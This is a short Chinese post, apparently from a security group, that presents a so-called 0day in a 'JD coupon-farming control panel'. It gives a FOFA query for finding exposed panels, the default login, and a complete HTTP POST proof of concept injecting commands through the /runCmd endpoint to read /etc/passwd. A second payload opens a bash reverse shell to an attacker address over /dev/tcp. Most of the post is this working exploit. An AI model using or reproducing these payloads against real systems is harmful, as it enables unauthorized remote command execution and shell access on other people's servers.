京东薅羊毛0day
FOFA: title="京东薅羊毛控制面板"
默认账户密码useradmin/supermanito
不过我没搞懂这是个什么系统,不是京东的应该
构造poc
POST /runCmd HTTP/1.1
Host: x.x.x.x
Content-Length: 54
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://x.x.x.x/runCmd
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: connect.0.13416810928385314=s%3ADihBr216xOtHaZ6_yq86aIF0UNpiCo5v.jLFQG19H1e%2FrP6NwaH0UX2tjYwsFQuhXIIaSIkVG4Jg
Connection: close
cmd=bash+jd.sh+%3Bcat+%2Fetc%2Fpasswd%3B+now&delay=500
反弹shell的话
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
可惜的是这个平台好像也不是很多人在用,也不是什么重要单位用,爆出来红队好像也没法用他打谁!!
本文迁移自知识星球“火线Zone”
